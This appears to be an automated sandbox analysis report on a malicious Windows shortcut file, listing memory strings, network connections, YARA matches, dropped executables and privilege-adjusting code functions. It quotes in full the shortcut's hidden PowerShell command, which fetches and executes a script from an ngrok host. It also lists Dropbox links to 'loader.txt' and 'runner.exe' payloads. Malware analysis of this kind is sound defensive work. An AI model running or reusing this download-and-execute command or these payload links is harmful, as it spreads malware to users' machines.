                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/j
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                      Source: powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_4765e3cd-1
                      Source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_8220639f-3
                      Source: Yara matchFile source: 29.3.854113748.exe.2ff0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.58b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.854113748.exe.2dd0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.854113748.exe.2ff0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 854113748.exe PID: 416, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 8100, type: MEMORYSTR

                      System Summary

                      barindex
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeFile dump: PerfectouinVans.exe.26.dr 979567347Jump to dropped file
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\854113748.exeJump to dropped file
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: 751ietQPnX.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A1CF4 NtAcceptConnectPort,CloseHandle,34_2_000001795E5A1CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A1AA4 NtAcceptConnectPort,NtAcceptConnectPort,34_2_000001795E5A1AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A0AC8 NtAcceptConnectPort,NtAcceptConnectPort,34_2_000001795E5A0AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A15C0 NtAcceptConnectPort,34_2_000001795E5A15C0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00460070: DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,26_2_00460070
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,26_2_0041E0F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,29_2_0041E0F0
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044F92B26_2_0044F92B
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00438BE126_2_00438BE1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0043814526_2_00438145
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0043911026_2_00439110
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0043430E26_2_0043430E
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044F4E426_2_0044F4E4
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044B58326_2_0044B583
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044D58E26_2_0044D58E
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044E62C26_2_0044E62C
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0043876626_2_00438766
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0043877926_2_00438779
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004357EA26_2_004357EA
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044E95A26_2_0044E95A
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041FAB026_2_0041FAB0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00449B6026_2_00449B60
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00434B3026_2_00434B30
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044CC6D26_2_0044CC6D
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00435C7F26_2_00435C7F
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00434DB026_2_00434DB0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044EE4726_2_0044EE47
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0050DE5C26_2_0050DE5C
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00436E5E26_2_00436E5E
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044EE0226_2_0044EE02
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00436E3626_2_00436E36
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00436ED826_2_00436ED8
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00435F0126_2_00435F01
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00461F1026_2_00461F10
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00468F8026_2_00468F80
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0044EFA926_2_0044EFA9
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_006081D229_3_006081D2
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_005FC23129_3_005FC231
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_005FC40029_3_005FC400
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0043430E29_2_0043430E
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0043985D29_2_0043985D
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041FAB029_2_0041FAB0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435B7129_2_00435B71
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435B8D29_2_00435B8D
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435C7F29_2_00435C7F
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435C8429_2_00435C84
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435F0129_2_00435F01
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00461F1029_2_00461F10
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00468F8029_2_00468F80
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00435F8B29_2_00435F8B
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A0C7034_2_000001795E5A0C70
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\854113748.exe AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe 3A101A1B1DCDAB3321FA1157C86B3A418965F542051FF70AF24FA0B9B4CA9D85
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 00474096 appears 338 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 005FCD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0040AC20 appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0044E7B0 appears 38 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0040AB60 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@90/359@21/14
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,26_2_0041E0F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,26_2_00419CF0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,26_2_00419D90
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,29_2_0041E0F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,29_2_00419CF0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,29_2_00419D90
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00463750 GetDiskFreeSpaceW,26_2_00463750
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004197C0 LoadBitmapW,CoInitialize,CoCreateInstance,CoUninitialize,CoSetProxyBlanket,CoUninitialize,CoUninitialize,VariantInit,VariantClear,VariantClear,VariantClear,CoUninitialize,26_2_004197C0
